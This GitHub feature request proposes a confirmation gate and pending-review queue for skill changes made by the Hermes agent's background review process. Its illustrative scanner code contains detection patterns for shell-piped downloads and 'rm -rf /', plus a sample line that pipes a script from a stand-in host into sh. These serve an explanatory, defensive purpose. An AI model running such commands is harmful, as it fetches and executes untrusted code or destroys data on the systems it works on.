hermes - [Feature]: Add `skills.evolution_mode`, a confirmation gate for autonomous skill evolution

Root Cause

The background review agent (_spawn_background_review) can create, patch, edit, and delete skills in ~/.hermes/skills/ without any user confirmation. This is acceptable for personal workflows, but in shared or production deployments it may introduce unintended workflow mutations, difficult-to-audit state transitions, and operational instability.

Example failure mode: a background review patch to an existing skill passed the current skills_guard security scan and was applied immediately via clear_skills_system_prompt_cache(clear_snapshot=True). Because the change became active within the same runtime session, downstream workflow behavior changed without any approval, diff review, staging step, or rollback checkpoint. The only observable signal was a single log entry:

💾 Skill patched

As a result, operators had no opportunity to inspect or reject the mutation before it affected the live skill environment.

Root causes

  1. No audit trail before impact. Skill changes take effect immediately. The only signal is a one-line log — no diff, no review step, no rollback option before activation.

  2. The current confirmation requirement is not enforceable for detached execution flows. The skill_manage schema description includes guidance such as "Confirm with user before creating/deleting", but background review runs in a detached execution context with no interactive I/O surface. As a result, skill_manage operations originating from background review are applied directly to disk without a runtime approval boundary.

  3. Existing guard only catches malicious patterns. skills.guard_agent_created (default: False) runs regex-based security scanning, but this detects malware, not incorrect or premature skill updates. A well-intentioned but wrong patch passes the guard cleanly.
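
The third point can be illustrated with a minimal sketch. The patterns below are hypothetical and are not the real skills_guard rules; they only show that a regex scan flags known-bad strings, while a harmless-looking but incorrect instruction passes untouched.

```python
import re

# Hypothetical patterns for illustration only; NOT the real skills_guard rules.
SUSPICIOUS_PATTERNS = [
    re.compile(r"curl\s+[^|]*\|\s*(ba)?sh"),  # piping a download into a shell
    re.compile(r"rm\s+-rf\s+/(\s|$)"),        # wiping the filesystem root
]


def scan(content: str) -> list[str]:
    """Return the patterns that matched; an empty list means the scan passed."""
    return [p.pattern for p in SUSPICIOUS_PATTERNS if p.search(content)]


malicious_patch = "Step 1: run `curl https://example.invalid/x.sh | sh`"
# Syntactically harmless, but pins a version that breaks the workflow.
wrong_patch = "Step 1: run `npm install react-i18next@0.0.1`"

print(scan(malicious_patch))  # one pattern matches
print(scan(wrong_patch))      # nothing matches, so the patch would go live
```

A pattern scan answers "is this content dangerous?", not "is this change correct?", which is the gap a confirmation gate is meant to cover.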

Current confirmation coverage

| Scenario | Confirmation? |
| --- | --- |
| CLI hermes skills install | Yes (input() prompt) |
| Slash /skills install | No (TUI limitation, skip_confirm=True) |
| Background review → skill_manage(create) | No |
| Background review → skill_manage(patch/edit) | No |
| Background review → skill_manage(delete) | No |
| Agent in-conversation → skill_manage | No (schema-level advisory guidance only) |

Security Impact

No new attack surface. confirm and readonly modes restrict what autonomous code can do — they never grant additional privileges. The pending queue is written to the same ~/.hermes/skills/ directory the agent already has access to. skills_guard scanning still runs on the content before it enters the pending queue, maintaining the existing security baseline.

Acceptance Criteria

  • skills.evolution_mode config key registered with auto (default) / confirm / readonly values
  • auto mode preserves current behavior exactly (backward compatibility)
  • readonly mode suppresses all skill_manage calls from background review (returns suppressed: True)
  • confirm mode redirects background review skill_manage writes to ~/.hermes/skills/.pending/
  • Pending queue stores manifest.json with diff, metadata, and skill snapshot
  • /skills review slash command lists pending changes with apply/discard/diff options
  • hermes skills review CLI command with --apply-all / --discard-all flags
  • Pending changes older than pending_ttl_days are auto-discarded on session start
  • Non-interactive surfaces (Telegram, Discord, gateway) announce pending changes via platform message
  • skills_guard scanning still runs on content before it enters pending queue
  • Tests for confirm and readonly modes in test_skill_manager_tool.py
  • Tests for pending queue lifecycle in test_skills_review.py
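
The TTL criterion above could be sketched roughly as follows. This assumes one directory per pending change, each holding a manifest.json with the `id` and `timestamp` fields from the proposed envelope; the function name `prune_expired` and its parameters are hypothetical, not part of Hermes.

```python
import json
import shutil
from datetime import datetime, timedelta, timezone
from pathlib import Path
from typing import Optional


def prune_expired(pending_root: Path, ttl_days: int,
                  now: Optional[datetime] = None) -> list[str]:
    """Delete pending change directories older than ttl_days; return their ids."""
    now = now or datetime.now(timezone.utc)
    cutoff = now - timedelta(days=ttl_days)
    removed: list[str] = []
    if not pending_root.is_dir():
        return removed
    for change_dir in sorted(pending_root.iterdir()):
        manifest = change_dir / "manifest.json"
        if not manifest.is_file():
            continue  # not a pending change; leave it alone
        meta = json.loads(manifest.read_text(encoding="utf-8"))
        # Envelope timestamps end in "Z"; normalise so fromisoformat() accepts them.
        created = datetime.fromisoformat(meta["timestamp"].replace("Z", "+00:00"))
        if created < cutoff:
            shutil.rmtree(change_dir)
            removed.append(meta["id"])
    return removed
```

Passing `now` explicitly keeps the function deterministic under test; a session-start hook would call it with the configured pending_ttl_days and the default clock.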

Related

  • #20375 — surface skill candidates before background skill creation (creation-time dedup, complements this change-time gate)
  • #20708 — Permission Gateway RBAC (who can use a skill; this issue is about whether a change should go live)

Related Code Paths

  • Background review spawn: run_agent.py:3218 (_spawn_background_review)
  • Skill write operations: tools/skill_manager_tool.py:326-637 (_create_skill, _edit_skill, _patch_skill, _delete_skill)
  • Security scanner: tools/skills_guard.py:41-51 (INSTALL_POLICY)
  • Guard config: tools/skill_manager_tool.py:56-69 (_guard_agent_created_enabled)
  • Skill cache invalidation: tools/skill_manager_tool.py:696-699 (clear_skills_system_prompt_cache)
  • Existing approval system: tools/approval.py

Feature Type

Configuration option / Safety & reliability

Scope

Pending queue module plus changes across skill_manager, config, CLI, slash commands, run_agent, etc.

Proposed Solution

Introduce a skills.evolution_mode configuration key with three modes:

auto (default — current behavior)

No change. Background review writes skills directly. Preserves backward compatibility for personal / development use.

confirm (new — pending approval queue)

Background review writes proposed changes to a pending directory (~/.hermes/skills/.pending/) instead of the live skill store. Each pending change is stored as a JSON envelope:

{
  "id": "20260507-a1b2c3",
  "action": "patch",
  "skill_name": "react-i18n-setup",
  "timestamp": "2026-05-07T10:30:00Z",
  "origin": "background_review",
  "diff": "--- a/SKILL.md\n+++ b/SKILL.md\n...",
  "skill_dir_snapshot": "/path/to/.pending/20260507-a1b2c3/react-i18n-setup/"
}
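
As a rough sketch of how such an envelope might be produced, the helper below stages a patched SKILL.md and writes a manifest next to it. The name `stage_patch`, its parameters, and the placement of manifest.json inside the per-change directory are assumptions made for illustration; only the envelope fields come from the proposal.

```python
import difflib
import json
from datetime import datetime, timezone
from pathlib import Path


def stage_patch(pending_root: Path, change_id: str, skill_name: str,
                old_text: str, new_text: str,
                origin: str = "background_review") -> Path:
    """Write a proposed SKILL.md patch under pending_root/<change_id>/.

    Returns the path of the manifest that describes the change.
    """
    change_dir = pending_root / change_id
    snapshot_dir = change_dir / skill_name
    snapshot_dir.mkdir(parents=True, exist_ok=True)
    # Snapshot of the skill as it would look after the patch is applied.
    (snapshot_dir / "SKILL.md").write_text(new_text, encoding="utf-8")

    diff = "".join(difflib.unified_diff(
        old_text.splitlines(keepends=True),
        new_text.splitlines(keepends=True),
        fromfile="a/SKILL.md",
        tofile="b/SKILL.md",
    ))
    envelope = {
        "id": change_id,
        "action": "patch",
        "skill_name": skill_name,
        "timestamp": datetime.now(timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ"),
        "origin": origin,
        "diff": diff,
        "skill_dir_snapshot": str(snapshot_dir) + "/",
    }
    manifest = change_dir / "manifest.json"
    manifest.write_text(json.dumps(envelope, indent=2), encoding="utf-8")
    return manifest
```

Storing both the diff and a full snapshot means review can show the diff while apply only needs to move a directory, at the cost of some duplicated data.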

On the next user interaction (or via explicit /skills review), Hermes presents the pending changes:

💾 1 pending skill change(s):
  [patch] react-i18n-setup — added fallback chain step (background_review)

Review? [y]es / [n]o / [d]iff / [s]kip all
  • y — apply: move from .pending/ to live skills/, call clear_skills_system_prompt_cache
  • n — discard: remove from .pending/
  • d — show full diff, then re-prompt
  • s — discard all pending
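
The per-change options above could be handled by a loop along these lines. This is a sketch under stated assumptions: `review_change`, `ask`, and `show` are hypothetical names, the snapshot lives at `<change_dir>/<skill_name>/`, and the `s` option is left out because it acts on the whole queue rather than on one change.

```python
import shutil
from pathlib import Path
from typing import Callable


def review_change(change_dir: Path, skill_name: str, live_root: Path, diff: str,
                  ask: Callable[[str], str] = input,
                  show: Callable[[str], None] = print) -> str:
    """Prompt for one pending change; return "applied" or "discarded"."""
    while True:
        answer = ask("Review? [y]es / [n]o / [d]iff: ").strip().lower()
        if answer == "d":
            show(diff)  # show the full diff, then re-prompt
            continue
        if answer == "y":
            target = live_root / skill_name
            if target.exists():
                shutil.rmtree(target)  # replace the live copy with the snapshot
            shutil.move(str(change_dir / skill_name), str(target))
            shutil.rmtree(change_dir)  # drop the manifest and the empty change dir
            # A real implementation would call clear_skills_system_prompt_cache here.
            return "applied"
        if answer == "n":
            shutil.rmtree(change_dir)
            return "discarded"
        # Any other input falls through and the prompt is shown again.
```

Injecting `ask` and `show` keeps the loop independent of the terminal, so the same logic could sit behind a slash command or a platform button handler.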

For non-interactive surfaces (Telegram, Discord, gateway), pending changes are announced via the platform message and confirmed via a reply or button interaction.

readonly (new — frozen skills)

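Background review skill_manage calls are suppressed and return suppressed: True. Only operator-initiated installation flows or direct filesystem edits may modify the live skill store. Suppressed changes are reported in the log: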

💾 1 skill change suppressed (skills.evolution_mode=readonly)
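
Taken together, the three modes amount to a small routing decision made before a write reaches disk. The sketch below is one way to express it; `EvolutionMode`, `gate_skill_write`, and the returned dictionary shape are hypothetical, and it assumes the gate applies only to writes whose origin is background_review.

```python
from enum import Enum


class EvolutionMode(str, Enum):
    AUTO = "auto"
    CONFIRM = "confirm"
    READONLY = "readonly"


def gate_skill_write(mode: str, origin: str) -> dict:
    """Decide what happens to a skill_manage write before it touches disk."""
    parsed = EvolutionMode(mode)  # raises ValueError on an unknown mode
    # Assumption: only background review writes are gated in this sketch.
    if origin != "background_review" or parsed is EvolutionMode.AUTO:
        return {"decision": "apply"}
    if parsed is EvolutionMode.CONFIRM:
        return {"decision": "stage"}  # redirect to the pending queue
    return {"decision": "suppress", "suppressed": True}


print(gate_skill_write("confirm", "background_review"))
```

Rejecting unknown mode strings up front avoids silently falling back to auto when the configuration contains a typo.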

Alternatives Considered

No response

Feature Type

Configuration option

Scope

Large (new module or significant refactor)

Contribution

  • I'd like to implement this myself and submit a PR
